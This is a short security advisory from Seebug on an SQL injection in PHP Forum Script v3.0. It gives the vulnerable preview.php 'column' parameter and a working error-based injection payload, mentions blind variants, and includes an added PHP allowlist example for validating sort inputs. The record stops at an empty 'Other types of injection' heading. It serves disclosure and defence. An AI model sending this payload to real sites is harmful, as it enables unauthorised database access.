PHP Forum Script v3.0 - SQL Injection

2017-03-29T00:00:00
ID SSV:92851
Type seebug
Reporter Z3r0yu
Modified 2017-03-29T00:00:00

Description

PHP Forum Script v3.0 - SQL Injection

PHP Forum Script v3.0 does not strictly filter one of its request parameters, resulting in a SQL injection vulnerability. If the server has error display enabled, the injection can be exploited directly through the returned error messages; if error display is disabled, time-based and Boolean-based blind injection can be used instead.

Google Dork:

N/A

Injection point:

http://localhost/[PATH]/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&column=[SQL]created&direction=DESC
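The `column` and `direction` parameters above appear to select the sort column and sort order of the question list. As an added example (not PHP Forum Script's own code), this is how such inputs can be mapped onto a fixed allowlist before they reach an ORDER BY clause, since SQL identifiers cannot be bound as PDO parameters; the table and column names are assumptions.

```php
<?php
// Added example, not the vendor's code: allowlist validation for ORDER BY inputs.
// Identifiers cannot be bound as PDO parameters, so the only safe option is to
// map the user-supplied value onto a fixed set of known column names.
// Table and column names below are assumptions for the example.

const ALLOWED_SORT_COLUMNS = ['created', 'title', 'views'];
const ALLOWED_DIRECTIONS   = ['ASC', 'DESC'];

/**
 * Returns a validated [column, direction] pair, falling back to the defaults
 * when the request carries anything outside the allowlist.
 */
function resolveSort(array $query): array
{
    $column    = (string) ($query['column'] ?? 'created');
    $direction = strtoupper((string) ($query['direction'] ?? 'DESC'));

    // Strict in_array(): no type juggling, and the value that reaches the
    // query is always one of our own literals, never the raw request string.
    if (!in_array($column, ALLOWED_SORT_COLUMNS, true)) {
        $column = 'created';
    }
    if (!in_array($direction, ALLOWED_DIRECTIONS, true)) {
        $direction = 'DESC';
    }
    return [$column, $direction];
}

function loadQuestions(PDO $pdo, array $query, int $limit = 20): array
{
    [$column, $direction] = resolveSort($query);
    // $column and $direction are allowlisted literals; the only remaining
    // user-influenced value is the LIMIT, which is bound as an integer.
    $sql  = "SELECT id, title, created FROM questions "
          . "ORDER BY `$column` $direction LIMIT :limit";
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':limit', $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed request shaped like the advisory's injection point: a value that
// is not a known column name is discarded and the default sort is used.
var_dump(resolveSort(['column' => '(SELECT 1)created', 'direction' => 'DESC']));
```

Any request whose `column` value falls outside the allowlist is also worth logging, since legitimate clients of the forum's own UI never send one.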

payload:

/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&column=(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(md5(233),0x717a787071,(SELECT (ELT(7489=7489,1))),0x7171786a71,0x78))s), 8446744073709551610, 8446744073709551610)))&direction=DESC

Test screenshot:

Other types of injection: